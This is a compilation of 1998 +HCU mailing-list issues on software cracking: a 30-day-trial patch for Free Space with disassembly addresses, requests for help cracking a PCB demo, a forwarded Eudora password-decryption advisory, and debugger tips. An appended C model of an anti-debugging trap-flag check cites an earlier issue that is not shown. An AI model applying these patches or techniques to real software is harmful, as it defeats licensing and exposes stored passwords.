one being a cheap ram only self replicator that picked random locations in memory and was completely written in bytes - with all relocatable code (all in ram because no hard drives... and meant too fast to duplicate to another machine before it crashed all of memory)

the other is the symbiote which i created as a way to add your own code to both exe's and com files (i wouldn't allow myself to stop at just one type - i am too pushy of myself for that)

interesting note.. since it uses standard methods to attach your code to another, it is funny - some of the newer virus scanners mistake it for one (much like KOH which some idiot whined and insulted me for weeks over the internet because he believed the virus scanner and would not consider that it is NOT a virus --- thus is the way of sheep who believe everything they hear without doing any real research)

again, take care - this is a fun topic :)

+gthorne

-----#2-------------------------------------------------
Subject: virii vs. viruses (or: is Ghiribizzo schizophrenic?)

>>>> BTW - why virii and not viruses? (yes, I studied 6 years of Latin).... <<<<

You'll know that the stem of the Latin word for virus doesn't have a plural.
In the world of biological viruses, those involved use the term 'viruses' - this is the term Ghiribizzo uses. Most virus programmers (myself included - when I had my old persona) use the term virii. Why? Because it saves two bytes! :)

[hey, that's quite a good joke - explains this commonly asked question better than anywhere else I've seen! :)]

~~ Ghiribizzo

-----#3-------------------------------------------------
Subject: Bringing floppy disks from the dead

I had a little think about fixing the floppy disk I killed and was beginning to reverse engineer format.com to use its basic code when I realised the tool was already there! Use the /c option to check all clusters currently marked bad. If it is possible to quickformat using this option, then maybe this is a good way to 'lock' a disk as not many people will know about this and also won't be able to destroy the data via format.

~~ Ghiribizzo

-----#4-------------------------------------------------
Subject: To: zinger

You can publish all I said if you want, I just want to clarify again that I don't like viruses except for learning purposes, I can't find any good reason to code one and release it.

Regards.

=====End of Issue 155===================================

========================================================
+HCU Maillist Issue: 156 03/04/1998
--------------------------------------------------------
========================================================

CONTENTS:

#1 Subject: Freespace-Essay
#2 Subject: Search for Tristan

ARTICLES:

-----#1-------------------------------------------------
Subject: Freespace-Essay

Hi all, this is my first little essay. I hope it is o.K. If not please tell me what I can do better in future.
Target: Free Space 1.0 at ************************************
Protection: 30-day-trial
Tools: Wdasm8.9, Softice 3.01

For this program I had to patch 2 programs: Frespace.exe and fs32.exe. Both have self-modifying code (I suggest).

First Frespace.exe:

    * Reference To: KERNEL32.CloseHandle, Ord:0018h
    |
    :00406A28 FF1538544200    Call dword ptr [00425438]
    :00406A2E 8B84247C010000  mov eax, dword ptr [esp+0000017C]
    :00406A35 50              push eax
    :00406A36 FF15F8254100    call dword ptr [004125F8]

*here I replaced this call at 406a36 with a "call 404770" (the original code):

    * Referenced by a CALL at Address:
    |:0040219D
    |
    :00404770 8B442404        mov eax, dword ptr [esp+04]
    :00404774 83EC70          sub esp, 00000070
    :00404777 89442408        mov dword ptr [esp+08], eax
    :0040477B 53              push ebx
    :0040477C 56              push esi
    :0040477D 57              push edi
    :0040477E 8BB42484000000  mov esi, dword ptr [esp+00000084]
    :00404785 55              push ebp
    :00404786 56              push esi

Second: fs32.exe

    * Reference To: KERNEL32.CloseHandle, Ord:0018h
    |
    :00404AC4 FF1548034100    Call dword ptr [00410348]
    :00404ACA 8B842480010000  mov eax, dword ptr [esp+00000180]
    :00404AD1 50              push eax
    :00404AD2 FF1568D24000    call dword ptr [0040D268]

*here I replaced this call at 404ad2 with a "call 408540" (the original code):

    * Referenced by a CALL at Address:
    |:00408130
    |
    :00408540 8B442404        mov eax, dword ptr [esp+04]
    :00408544 83EC10          sub esp, 00000010
    :00408547 3B05D0F84000    cmp eax, dword ptr [0040F8D0]
    :0040854D 53              push ebx
    :0040854E 56              push esi
    :0040854F 57              push edi
    :00408550 55              push ebp

That's all.

NiKai
5777852 (ICQ)

-----#2-------------------------------------------------
Subject: Search for Tristan

Hi, sorry for this off-topic, but I am searching for a person named Tristan. I read an essay by him at fravia's pages and I lost his email address. Can anybody help?
NiKai
5777852 (ICQ)

=====End of Issue 156===================================

========================================================
+HCU Maillist Issue: 157 03/05/1998
--------------------------------------------------------
========================================================

CONTENTS:

#1 Subject: none
#2 Subject: "grasping +orc's lessons"

ARTICLES:

-----#1-------------------------------------------------
Subject: none

Does anyone have hints on using winice 3.22 with mga millenium2? I just need this info, for the rest all is ok
thx

-----#2-------------------------------------------------
Subject: "grasping +orc's lessons"

Hi +HCU, how are you guys. Sorry to take your time once again, but I am in need of your expertise and opinion.

I am a new student of cracking and have downloaded many tutorials including the +ORC tutorials. I'm finding it difficult, however, to grasp and follow +ORC's work; one main reason is that the target files and the tools he uses are relatively hard to find now, they are not recent, many are outdated which makes it even harder to find. Even with the more modern versions it becomes confusing to follow since many functions and instructions have changed. Another main reason is that I find his methods are somewhat different to the more modern tutorials, especially in +ORC's first few lessons. Despite this however I am able to understand and follow the more modern tutorials.
BUT EVEN SO I still feel a "void" in not having totally understood +ORC's lessons. I know you regard +orc highly and are one of those who did break the barrier and grasp the teachings.. how long did it take?... did you have a struggle?... how did you finally crack the barrier?

I guess what I really want to know is... will I miss something important and ENLIGHTENING if I do not totally understand the lessons? Please let me know so that I can decide whether to move on or to continue to wrestle with the lessons until I win the prize.

Thank you for your time and help, hope to hear from you soon.

=====End of Issue 157===================================

========================================================
+HCU Maillist Issue: 158 03/06/1998
--------------------------------------------------------
========================================================

CONTENTS:

#1 Subject: re: "grasping +orc's lessons"
#2 Subject: gthorne re:
#3 Subject: gthorne - re: grasping orc lessons

ARTICLES:

-----#1-------------------------------------------------
Subject: re: "grasping +orc's lessons"

Hi +HCU,

In reply to the letter in last issue, I too am new to cracking. I have also found it a challenge to grasp +ORC's tutes, but mainly due to the distractive feel of the tutes.. The actual crack is not often explained too well, more quickly "shown". I wish to take nothing away from +ORC; the work he has done along with GreyThorne and Fravia is nothing short of legendary. (how many HOURS????)

If you need the tools, programs etc, check out GreyThorne's website. The ORC tutes are bundled with every file needed for the tute.

greythorne.home.ml.org

I know too well of the Barrier you face, but hang in there!
for an idea of timeframe: with no programming experience, I have been at it for 2 months (on & off, work and wife don't leave much time!!). I have not yet completed a crack by myself, but feel it is close.

I guess you wanted some feedback from more experienced crackers, but I wanted to let you know that you are not alone.

cheers!!

-----#2-------------------------------------------------
Subject: gthorne re:

(you may want to sign your messages to the hcuml with a nickname since no one has any clue who you are from the anonymous message you posted)

though you are bound to get a bunch of replies, i have already tried to take care of the tools aspect

go to my site ***************************** and download the orcpaks you find there

just about everything and then some ever listed in the orc tutorials is there, and the index file has most of them catalogued so you can see what is in them

other useful sites, though not encapsulated in such a manner, are all over the web, and a good one is *************************** assuming caligo can stay online with all his tools as well

for completely new people, i tend to send them to lesson 4 on wlcheck, since the 16 bit crack was mine, and the 32 bit crack completed by fravia (see if you can follow along in that order) - and it was done in mostly wdasm (using softice to follow along in the code is a good idea for any crack, and you may find it useful to use both softice and some form of disassembler in conjunction as one often reveals something that may have been rather hard to spot in the other)

the other windows lesson i wrote on siren mail uses a similar technique - so it might be handy for you to check that out as well (siren mail crack on fravia's site and sirenpak in the orcpaks/more directory of my website)

* btw - if someone tries to use sirenpak and cannot load it, please let me know, i may need to update an old dll that is in there, not sure *

if you are an irc buff, the people in #cracking4newbies tend
to be helpful if they can, as some of them are not newbies at all - but love to hang around in that channel since it is more friendly than others (often you will find me there as well when i am not so busy - to hang out and chat for a bit while trying to relax from a ton of coding)

channel #cracking is a good one for the more technical minded who have been around a while - meaning that most of the crackers there are long in the cracking scene and tend to be slightly jaded from so many newer crackers and their many needs - which is the same reason i made my website in the first place, so i could help more people indirectly since direct is much too time consuming

any other addresses of sites would be completely welcome additions to hcuml - and should be posted on occasion since the newer users of our mailing list cannot get the addresses out of the back issues which have been stripped of them (just not too often or it becomes spam ;)

mexelite's page is focused on a newer user as well - i think it is mex98.home.ml.org - but this can be verified on channel #cracking4newbies since mexelite tends to hang around there

for that matter, #revolt seems to be restructuring lately after a long break and many changes, so for any of you who are interested in checking them out and seeing if they are up to cracking or helping somehow, it can't hurt, though it may take a bit before things get really rolling for them again

well, back to coding i go...
i don't want to seem like i don't ever shut up ;)

take care

+gthorne

-----#3-------------------------------------------------
Subject: gthorne - re: grasping orc lessons

the message i just sent had the topic cut off, and was meant to respond to the letter on someone needing help grasping orc lessons

+gthorne

=====End of Issue 158===================================

========================================================
+HCU Maillist Issue: 159 03/07/1998
--------------------------------------------------------
========================================================

CONTENTS:

#1 Subject: Re: What every cracker should have
#2 Subject: (Fwd) Eudora 4.0 password encryption flaw
#3 Subject: Be encouraged and not discouraged by what you find.
#4 Subject: gthorne - an interesting day

ARTICLES:

-----#1-------------------------------------------------
Subject: Re: What every cracker should have

Hi Wafna, will you tell me the rest of your tricks if I send you the full German version of Skat2010? :) It's a 487 kb self-extracting exe.

NiKai
5777852 (ICQ)

-----#2-------------------------------------------------
Subject: (Fwd) Eudora 4.0 password encryption flaw

Somebody sent me this, perhaps someone may be interested

------- Forwarded Message Follows -------

THE PROBLEM

The mail program Eudora from Qualcomm Inc. has the ability to save the mail password in its INI file ('save password'). This password is encrypted in a not-too-strong way.

HOW-TO

There's a program called EUDPASS.COM on the Net that can easily decrypt this password.
Although Qualcomm does know about this (I mentioned the problem several times, also prior to the release of Eudora 3), the problem still exists in current versions and has not been fixed.

AFFECTED SOFTWARE

ALL Eudora clients for Windows are vulnerable, Light and Pro, including the just-released version 4. As I don't have a Macintosh, I could not verify how Eudora stores its password on a Mac.

WHAT TO DO

Although they know the problem, no solution has been offered by Qualcomm. Until they change the encryption algorithm, the password can be easily decrypted by anyone with access to the INI file. Of course, having the INI file means someone can check your mail. But that 'someone' could not use the password to log in directly to the machine the mail is stored on. With this utility, the password itself can be obtained. Don't save your password, or make sure your INI file (better, the entire mail directory) can not be accessed by anyone. Hope Qualcomm will change the algorithm some day.

-----#3-------------------------------------------------
Subject: Be encouraged and not discouraged by what you find.

Hail +All and +new:

Briefly coming back from the dead zone of the working class for a break. To the new student(s) of cracking who posted on March 5, welcome to the dark woods. Yeah, having come this far, you only begin to realize how far you have to go. Go check out +gthorne's Orcpacks and fravia+ essays for stuff to work at on your own pace. More than enough there to keep one occupied with a cross section of research material for a long time. There's no real barrier to crack, just a lot of reading and getting your hands on the corresponding programs to practice on, in order to acquire and properly apply your knowledge and skill. I doubt that many of us are full time crackers, making a fortune selling cracks.
I myself have found that by visiting fravia+ and reading this mailing list, I reinforce my problem solving and searching skills for the work place, where I earn my living. At this school of higher learning, there is no supervision. No one to tell you what to do and how to do it. You've got to be your own master and tell yourself when you are on the wrong track and get back on the right one. Easy to say, tough to do.

< I guess what i really want to know is...will i miss something
< important and ENLIGHTENING if i do not totally understand the
< lessons? please let me know so that i can decided wether to
< move on or to continue to wrestle with the lessons until i win
< the prize.

For the same reasons why we are not all born on the same day and live the same lives, what do you think you are missing? You can spend your whole life searching and still not find it. If you do find it, can you take it to your grave with you?

If you need a place to hang out, this is it, not because of the topic but because of the intellectual interaction and discussion among the members. Like lions, they will bring down the prey of some holy protection scheme and expose the inner workings and tender morsels for you to contemplate and digest. It is their precious gift to you, but you've got to be around to receive it. If you are like myself at this point in time, master in no area of expertise, just sit back and soak it in like a sponge. The generosity of the participants in sharing their knowledge is overwhelming and it's free. In time, you'll be amazed at what you have learnt. You do have time, don't you?

wlc

-----#4-------------------------------------------------
Subject: gthorne - an interesting day

I just attended another of about five 2600 meetings I have ever been to and it started out kinda lame until the first person showed up late and started peeking through the o'reilly tcp/ip and unix manuals I had strewn about the table.
He and I played 'spot the fed' for a while, though they seemed not to be around at this particular one - 'seemed' being the operative word.

The (rather spastic fellow.. which is kind of like me on too much coffee as i have been all day..) handed me a copy of the newest 2600 magazine which does not hit the newsstand for 3 days (of which he had several copies...)

At this point i was of course rather impressed, first at the interest which he showed in deterring tcpip attacks (of which one of his servers seems to have problems with one in particular - and a problem with which i am not at all that useful in solving (yet)) and then about the fact that he had these magazines in abundance which were not generally available.

So I finally got around to asking who he was, and i recognize him from a few months ago as well.. with a friend of his (his friend states that cold fusion 4 and above has the innate ability to adjust remote webserver variables - of which i will have to see for myself!)

It turns out that (for you fellows who have a copy of this interesting magazine and have actually looked at the front cover (and who are ready to shoot me by now for being so damned suspenseful...)) he is none other than Ben the layout editor for 2600 magazine.

Well dear readers, I am quite the decadent one and of course had him sign my new copy :)

Of all the places in the world to be, it would seem he and i live in the same town

This is actually the first meeting that I have been to that actually led anywhere, as we discussed what I (we in hcu) do - a little on how protocols worked... got a signed copy... etc...
Anyway - I thought it was rather cool, no one else near me seems to be interested in codes and cracking, hacking and the like - as it has always been for me

The sad part of course is that no one of that fine 'organization' seems to have any idea what we do, or that cracking.net ever even existed (not that i am surprised, but it is still disappointing nonetheless)

Maybe with luck (and a little work on my part) the gap between hackers and crackers can be made a little less obvious

Who knows. I think I am going to have another coffee.

+gthorne

=====End of Issue 159===================================

========================================================
+HCU Maillist Issue: 160 03/09/1998
--------------------------------------------------------
========================================================

CONTENTS:

#1 Subject: some things I have learnt (I know - woopie)
#2 Subject: frustration with PCBDEMO
#3 Subject: virii
#4 Subject: Easter Egg in W95
#5 Subject: 2600 Magazine

ARTICLES:

-----#1-------------------------------------------------
Subject: some things I have learnt (I know - woopie)

Greetings ever1 !

I have a few things to vent today.... How lucky is +Gthorne to even BE at a 2600 meeting!!!??? If any1 has any info on getting 2600 mag in Australia please let me know, also I'd love to see any Back issues.

As the anon person who replied to the letter about the "barrier", +orc's lessons etc.. I believe that I have made vast progress this week (having been learning for approx 2 weeks) in a number of ways:

1. In #C4N some1 mentioned HWND - This was very enlightening! This shows what your program functions are

2. learning the search in SIce : s 0 l ffffff "strin_u_want"
   this searches for a string in memory:
   s - search
   0 - starting bytes
   l - length
   "strin" - the text you wanna look for

3. BPR R|W - is a breakpoint when a prog tries to read or write to specified mem address.
   ex : BPR 0013742bd 0013742bd RW

4. BPX hmemcpy - will break when a program copies to memory (I think!)

5. Once I have broken into the routine that I think is near the copy protection, I have been doing a "D ax" or "D 15c5" to find out what value is in the register or mem loc. Is this a good way to find things? I have also stepped through the code with F10 and did plenty of "d ". Am I wasting time? I am beginning to understand the ASM better from this anyway. I tend to look at anything that mucks with strings such as SI, DI, etc..

hope some of this helps some1... anything I am misguided in please let me know!!

cheers,
HaQue

-----#2-------------------------------------------------
Subject: frustration with PCBDEMO

Hi again ppl!!

I guess by now everyone in #c4n would be getting sick of me asking about ways to crack this program, But I cannot rest Till I have either cracked it or else found out it's not crackable.

The program is PCBDEMO.ZIP (PCB Designer by Niche software), available at ********************************* It is a printed circuit board program. They say that the only diff between the full ver and demo is that the demo will only print "sample.pcb"

I have found that in the c:\windows\pcb.ini file there is a "user, serial, address" field. I tried bpint 21, but it doesn't seem to access the file for that info... I can't find any way to register the program either. I cannot seem to load the Exports from the .exe, or the .dll ?? Doing HWND in Sice finds stuff like "SLHMessageBar", "SLHTipWindow" etc.. but I can't set bpx's on them.. (can't load the exports??)

I have found a string that says (Demo version) by itself which leads me to believe that the program puts that string in there while unregistered?

I have tried entering in user="HaQue", serial="11111111" in the pcb.ini, but have never found reference in Sice to show that PCBDEMO is using that info...
I have tried millions of things from my limited knowledge and It has come time to shout HELP!!!!!

I don't necessarily want any1 to write a crack, patch, tute etc - even a simple: "this program can be registered, and cracked" or "This is a demo only you twit" would be fine!

TIA
Cheers
HaQue

-----#3-------------------------------------------------
Subject: virii

Hi again my third letter today! - important info that some of you might not be aware of. I received this in another mail and some of you may use these files...

Here is a list of other possible/probable infected files that were reported by a Russian virus scanner called DrWeb, and Norton AV and Integrity Checker virus scanner. Some of these infected cracks are on web sites and a few are on the cd with 6,000 cracks. A working copy of PC Cillin would be great to run over these new cracks too!

cheers
HaQue

-----#4-------------------------------------------------
Subject: Easter Egg in W95

Hi there! This is my first time writing to the list. I'd like to show you an EasterEgg planted inside Micro$oft Windows 95 that you might not know. If you don't like things like this in the list, tell me! I won't do it again.

1st. You should create a new folder anywhere (i.e. desktop)
2nd. Change the name of the folder to "New Folder" -without the quotes and taking notice about Caps-.
3rd. Change the name again to "and now, the moment you've all been waiting for"
4th. Change the name once again to "we proudly present for your viewing pleasure"
5th. Last change "The Microsoft Windows 95 Product Team!"
6th. Once this last name change is done, switch your speakers on and open the folder.

Amazing how these guys increase the length of the 'operating system' (sic) with this nonsense....

BTW, why is it that HotMail URLs are not stripped in the articles we receive? I don't think we should get their email accounts now that it belongs to MicroSoft, should we?

Cheers
Mr.DoS

-----#5-------------------------------------------------
Subject: 2600 Magazine

Hello Everyone
Hello Gthorne

>The (rather spastic fellow.. which is kind of like me on too much
>coffee as i have been all day..) handed me a copy of the newest 2600
>magazine which does not hit the newsstand for 3 days (of which he had
>several copies...)

Due to my indolence: is 2600 a FREE magazine or in my dreams? :-))
Are there any FREE hacking magazines you would recommend?

cheers
Rundus

=====End of Issue 160===================================
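Returning to the TBDRIVER trap-flag check quoted from MnemoniX's article in Issue 154 above: the following C model is an added example, not code from the mailing list, from MnemoniX or from TBDRIVER. It assumes a toy 64-byte real-mode stack, a single-step trap that fires after every instruction while TF is set, and constructed FLAGS/CS/IP values; it shows why the word re-read after "dec sp; dec sp" no longer matches the word popped once an INT 1 handler has run in between.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Toy model of a real-mode stack segment: 64 bytes, SP counts bytes and
   grows downward.  Constructed for this example; not TBDRIVER's code. */
#define STACK_BYTES 64

typedef struct {
    uint8_t  mem[STACK_BYTES];
    uint16_t sp;
    bool     tf;              /* trap flag: INT 1 after every instruction */
    uint16_t flags, cs, ip;   /* what the CPU pushes when INT 1 fires */
} cpu_t;

static uint16_t rd16(const cpu_t *c, uint16_t a) {
    return (uint16_t)(c->mem[a] | (c->mem[a + 1] << 8));
}
static void wr16(cpu_t *c, uint16_t a, uint16_t v) {
    c->mem[a] = (uint8_t)(v & 0xff);
    c->mem[a + 1] = (uint8_t)(v >> 8);
}
static void push(cpu_t *c, uint16_t v) { c->sp -= 2; wr16(c, c->sp, v); }
static uint16_t pop(cpu_t *c) { uint16_t v = rd16(c, c->sp); c->sp += 2; return v; }

/* Single-step trap.  The CPU pushes FLAGS, CS and IP below SP, the INT 1
   handler runs (its body does not matter for the check), and IRET pops
   them again.  SP ends where it started, but the three words below SP now
   hold FLAGS/CS/IP instead of whatever the interrupted code left there.
   CLI does not prevent this: INT 1 is not masked by IF. */
static void end_of_instruction(cpu_t *c) {
    if (!c->tf) return;
    push(c, c->flags); push(c, c->cs); push(c, c->ip);   /* INT 1 entry */
    c->ip = pop(c); c->cs = pop(c); c->flags = pop(c);   /* IRET */
}

/* The TBDRIVER sequence from the listing, one model step per instruction.
   Returns true when the value re-read after "dec sp; dec sp" differs from
   the value just popped, i.e. something executed between the two reads.
   (A false negative is possible only if the saved word happened to equal
   the bytes the trap wrote over it.) */
bool tbdriver_trap_check(cpu_t *c, uint16_t ax, uint16_t bx) {
    push(c, ax);                end_of_instruction(c);   /* push ax    */
    push(c, bx);                end_of_instruction(c);   /* push bx    */
    uint16_t t = ax; ax = bx; bx = t;
                                end_of_instruction(c);   /* xchg ax,bx */
    ax = pop(c);                end_of_instruction(c);   /* pop ax     */
    c->sp -= 1;                 end_of_instruction(c);   /* dec sp     */
    c->sp -= 1;                 end_of_instruction(c);   /* dec sp     */
    bx = pop(c);                end_of_instruction(c);   /* pop bx     */
    bool tampered = (ax != bx); /* cmp ax,bx ; jz 02A1 means "all clear" */
    pop(c);                     /* pop bx: discard the word saved first  */
    return tampered;
}

/* Fresh CPU state with constructed FLAGS/CS/IP; run the check once. */
bool check_with_tf(bool tf) {
    cpu_t c = {0};
    c.sp = STACK_BYTES;
    c.tf = tf;
    c.flags = 0x0102;   /* constructed: TF (bit 8) set, IF clear, reserved bit 1 */
    c.cs = 0x1000;      /* constructed segment:offset of the interrupted code */
    c.ip = 0x02A0;
    return tbdriver_trap_check(&c, 0x1234, 0x5678);
}

int main(void) {
    printf("TF clear: %s\n", check_with_tf(false) ? "warn" : "ok");   /* ok   */
    printf("TF set:   %s\n", check_with_tf(true)  ? "warn" : "ok");   /* warn */
    return 0;
}
```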